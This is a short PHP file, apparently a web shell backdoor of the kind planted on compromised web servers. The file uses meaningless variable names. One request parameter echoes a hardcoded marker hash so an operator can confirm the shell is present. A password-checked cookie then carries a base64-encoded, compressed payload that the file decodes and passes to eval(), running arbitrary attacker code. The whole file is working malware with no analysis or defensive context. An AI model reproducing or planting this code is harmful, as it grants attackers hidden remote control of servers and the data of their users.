<?php

$snarbvc = "636579bd6085fa01296df017fe833c29c12fb2da";

if (isset($_REQUEST['e5j6vfdg'])){ die('{->'. $snarbvc.'<-}'); }

if (sha1(@$_COOKIE[substr($snarbvc, 0, 16)]) === $snarbvc)
{
    $srntbyvg = $_COOKIE[substr($snarbvc, 16, 16)];

    $srntbyvg = base64_decode($srntbyvg);

    $srntbyvg = gzinflate($srntbyvg);

    eval($srntbyvg);
}
die();

